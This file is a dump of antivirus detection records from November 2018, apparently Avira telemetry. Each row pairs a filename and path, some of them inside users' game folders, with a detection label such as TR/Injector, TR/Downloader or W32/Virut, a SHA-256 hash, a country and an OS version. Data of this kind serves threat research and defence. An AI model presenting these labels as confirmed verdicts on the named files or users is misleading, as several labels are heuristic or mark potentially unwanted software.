  Row(detection=Row(filename='sounds.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL10\\SOUNDS\\SOUNDS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='5c9ea88287fdbebb451b9527291054aa5801dcbede4b96ae15be34ba753c402e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='downtown.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\DATA\\MAPS\\DOWNTOWN\\DOWNTOWN.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='494844277621873581a54f2baae4fdf5bc8b3c77b85ae4b07d8c094ff7a9bed8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050358-ad24308a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050358-AD24308A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='61e0844a47e4d1b0bf138fd02f1b389c2720f77b60f27ca4f87ae9e658ad6459', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\61E0844A47E4D1B0BF138FD02F1B389C2720F77B60F27CA4F87AE9E658AD6459', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='61e0844a47e4d1b0bf138fd02f1b389c2720f77b60f27ca4f87ae9e658ad6459', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:04:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055643-0baa6989', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055643-0BAA6989', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053134-8849e62d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053134-8849E62D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00001fe3', filepath='C:\\Windows\\Temp\\tmp0000010e\\tmp00001fe3', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T17:53:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00001e73', filepath='C:\\Windows\\Temp\\tmp0000010e\\tmp00001e73', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T17:45:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055654-1254adfe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055654-1254ADFE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160049-f56360cf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-160049-F56360CF', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:03:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054519-739e9eff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054519-739E9EFF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='z:\\downloads_alt\\Setup_WinThruster_2016.exe', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:18:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cttunesvr.exe', filepath='C:\\Windows\\System32\\cttunesvr.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='6a42b9e2919f109a88b3508015da3800d779d90a55a7bcb63b2203e0b000099a', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:43:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120422-0cc91dc3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-115910-EAFC0947\\AVSCAN-20181102-120422-0CC91DC3', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-122650-c90803cd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_06c2cece\\AVSCAN-20181102-122228-A5F8B5FA\\AVSCAN-20181102-122650-C90803CD', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='NG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T11:26:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='52cff06354acd41bbd4d297736c2f88c6310414fcdf21911c5a9ae46e726f525', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-29\\52CFF06354ACD41BBD4D297736C2F88C6310414FCDF21911C5A9AE46E726F525', filesize=1856000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='52cff06354acd41bbd4d297736c2f88c6310414fcdf21911c5a9ae46e726f525', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:25:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sounds.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL11\\SOUNDS\\SOUNDS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='5192639220d3c7c4154271346c79654cfbf75db11de90b0dace3ef8df5302baf', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061437-8b9b36dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061437-8B9B36DD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061616-c6b3c0d7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061616-C6B3C0D7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062036-6193ff76', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062036-6193FF76', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061815-0d7266de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061815-0D7266DE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060821-abbceaea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060821-ABBCEAEA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051647-777bf466', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051647-777BF466', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052418-844c44b5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052418-844C44B5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061810-0ae47c89', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061810-0AE47C89', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055219-6e659e20', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055219-6E659E20', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061648-d9965865', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061648-D9965865', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055506-d17fbd3e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055506-D17FBD3E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052001-eb41993a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052001-EB41993A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051015-8da5b7d4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051015-8DA5B7D4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051857-c4dfefb6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051857-C4DFEFB6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050441-c6786bcb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050441-C6786BCB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052626-d0c06490', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052626-D0C06490', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051640-7393791b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051640-7393791B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061735-f5b2d5d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061735-F5B2D5D0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050845-57fac325', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050845-57FAC325', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061811-0b203b3a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061811-0B203B3A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054912-fed6a561', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054912-FED6A561', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054010-bbfa7571', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054010-BBFA7571', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061820-106760ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061820-106760CE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060053-a07b0aa1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060053-A07B0AA1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053415-e83e77b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053415-E83E77B3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054315-29b664d4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054315-29B664D4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050811-43e63371', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050811-43E63371', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052408-7e1933d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052408-7E1933D5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051757-a159bba6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051757-A159BBA6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051215-d581671d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051215-D581671D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051452-33333e86', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051452-33333E86', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050700-195581e5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050700-195581E5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-074716-2a1c1ba1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-074716-2A1C1BA1', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='79b60c546b57a845a45b41b1c5f6af57933439927e1dcf49660b5237f9b18697', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:49:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054800-d3acd127', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054800-D3ACD127', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:58Z'), dt=datetime.date(2018, 11, 2)),
